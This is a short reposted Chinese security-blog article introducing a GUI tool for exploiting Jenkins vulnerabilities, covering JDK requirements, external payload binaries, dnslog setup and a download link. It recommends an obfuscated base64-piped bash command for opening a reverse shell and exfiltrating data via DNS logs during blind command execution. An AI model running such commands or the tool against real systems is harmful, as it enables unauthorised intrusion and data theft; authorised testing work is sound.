Jenkins的综合漏洞利用工具

admin 2024年3月20日13:12:19评论27 views字数 482阅读1分36秒阅读模式

一款Jenkins的综合漏洞利用工具

使用

jdk版本

在windows或linux使用jdk8的哪一个版本应该都可以,在macOS里需要jdk8u较高的版本,比如jdk8u321

外置payload

从release下载windows_tools,linux_tools或macOS_tools并放在与JenkinsExploit-GUI-*-SNAPSHOT.jar相同的目录,或者可以自行打包tools_source中的python源码文件

如果是linux或macOS的话需要对外置payload进行chmod +x 赋予权限

Jenkins的综合漏洞利用工具Jenkins的综合漏洞利用工具

dnslog配置

进行dnslog设置,目前仅支持dnslog.pw和ceye.io

Jenkins的综合漏洞利用工具

进行检测

Jenkins的综合漏洞利用工具

  • 在验证无回显命令执行的时候为了避免转义问题,推荐用如下方式进行反弹shell和dnslog外带信息
bash -c {echo,Y....}|{base64,-d}|{bash,-i}

获取工具

https://github.com/TheBeastofwar/JenkinsExploit-GUI

 

原文始发于微信公众号(白帽学子):Jenkins的综合漏洞利用工具

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月20日13:12:19
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Jenkins的综合漏洞利用工具http://cn-sec.com/archives/2588834.html

发表评论

匿名网友 填写信息